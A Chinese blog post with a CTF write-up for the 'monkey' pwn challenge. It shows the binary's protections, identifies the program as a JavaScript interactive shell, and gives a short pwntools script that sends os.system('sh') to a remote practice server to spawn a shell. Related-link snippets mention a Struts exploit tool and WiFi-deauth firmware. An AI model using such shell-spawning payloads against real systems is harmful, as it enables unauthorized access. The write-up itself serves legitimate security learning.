pwn刷题num13---js交互式命令行模式

已于 2022-04-22 20:46:07 修改
阅读量899 收藏
点赞数
分类专栏: pwn CTF 攻防世界 文章标签: 系统安全 python 网络安全 c语言 安全
于 2022-04-22 20:03:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124353685
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
攻防世界
17 篇文章 0 订阅
订阅专栏

攻防世界pwn进阶区monkey

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
在这里插入图片描述

32位,小端序
未开启RELRO---got表可写
未开启canary保护---存在栈溢出
开启NX保护----注入的shellcode不可执行
未开启PIE----程序地址为真实地址
动态链接

运行后出现一个js>很奇怪
在这里插入图片描述
ida后找不到主函数
在这里插入图片描述
怀疑不是c语言程序
上查一下js,意思是JavaScript
看了别人的wp,发现这个程序直接是js的交互式命令行模式

os.system('sh')

这是js的系统调用shell的命令

exp

from pwn import *
sh = remote('111.200.241.244',55683)
sh.sendlineafter('js>',"os.system('sh')")
sh.interactive()

在这里插入图片描述

或者不用exp
直接连接到远程,输入os.system(‘sh’)在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnjs一个用于浏览器开发的Javascript库
08-09
pwn.js 一个用于浏览器开发的Javascript库
pwn:JavaScript事件系统的100 SLOC处理
05-15
wn JavaScript事件系统的<100 SLOC破坏。 从您自己的构造对象中委托它! 使用obj.prototype = Object.create(pwn); pwn您的对象没错-甚至不必担心您的构造函数-那是一些伪古典的垃圾。 你把它铺好了。 注册新的事件监听器 // obj.on(event, callback, context) obj . on ( 'change' , func , this ) ; // register listener with this context obj . on ( 'change' , func ) ; // register listener with obj's context 取消注册旧的事件监听器 // obj.off(event, callback, context) obj . off ( 'change' ,
XCTF PWN高手进阶区 之 js
neuisf的博客
01-28 304
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印read函数: 1...
XCTF PWN高手进阶区之JS
neuisf的博客
01-27 375
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印re...
学会使用交互式命令行
weixin_34174132的博客
06-11 3828
  我学习python迈出的第一步就是学习交互式命令行的使用。在这里,你可以通过一些简单的代码来测试你对python语法的认知是否正确,甚至可以通过你已有的编程知识大胆地写出一些你所猜测的python语句,看看它是否能成功执行,如若不行,可以看看那它的Traceback报错,看看问题出在哪了,这样也可以逐步加深你对python一些语法的认知。python命令行友好的交互能力(就是你输入一个语句执行...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
【前端基础】 JavaScript基础
https://github.com/Wheeeeeeeeels
08-28 193
JavaScript基础 1 JavaScript基础之基本语法 概念: 一门客户端脚本语言 运行在客户端浏览器中的。每一个浏览器都有JavaScript的解析引擎 脚本语言:不需要编译,直接就可以被浏览器解析执行了 功能: * 可以来增强用户和html页面的交互过程,可以来控制html元素,让页面有一些动态的效果,增强用户的体验。 JavaScript发展史: 【1】 1...
有关pwn的知识小记
Peanuts
02-08 624
scanf("%d",&amp;A); 此时输入“-”“+”可以填充栈但是不会破坏栈的内容。可以用来绕过canary malloc(0)#时会glibc根据其规定,会分配 0x20 个字节,但是如果i时无符号整数可以无限进行输入 可以构成堆溢出。 最大的int64:0x8000000000000000,正负数相同可以造成溢出 int:0x80000000,可以造成栈溢出 有关堆 ...
2021绿城杯pwn部分wp
eeeeeight的博客
09-29 1168
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
[JSMSA_CTF] 2023年12月练习题 pwn
最新发布
weixin_52640415的博客
12-08 161
libc-2.23 mallopt global_max_fast _IO_2_1_stdout_ orw
Chrome v8 pwn
sky123博客
04-17 2760
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
PwnTheBox-Jsfuck详解
x1520700的博客
05-27 1110
题目介绍 知识点: div盒子定义:包容js代码一切的东西,也就是F12查看器那的 Jsfuck是什么 控制台具有JSfuck解密的效果 编码认识:U2FsdGVkX1 是AES或DES 开头 一、审题、进行判断 进入题目,看见一个输入功能框,结合对xss的认识,又看见js误以为是xss注入,结果发现并不是; 通过仔细审题可以发现有一个定义词(JSPFUCK),网上百度一下,给了个介绍: ...
Pwn基础知识笔记
3569
12-15 4603
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
【黑客】pwn简介与入门
yeluoxiang的专栏
06-05 1673
作为一个刚刚工作两年的新生代程序员,还是喜欢接触一些新鲜事物的。前不久买了一个ruff的开发板,可以用js来控制硬件,官网如下https://ruff.io/zh-cn/...
NodeJS 下构建 命令行工具(CLI) 与 交互式命令界面 的实践
jclee95的个人博客
08-11 2056
你想快速搭建 如 vue-cli、create-vue 那样的炫酷脚手架吗?本文将讲解以下内容: Commander.JS是一个在NodeJS 环境下便捷地用于构建搞质量命令行工具的库,vue-cli 等很多命令行工具都是由它构建。本文详细讲解Commander.JS的相关概念,并通过案例介绍Commander.JS的使用方法。 inquirer.js 是一个实现交互式命令行界面的NodeJS库,文本还介绍了如何通过 inquirer.js 来实现交互式命令行界面。 此外,本文还介绍了一些其他的小工具,如
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值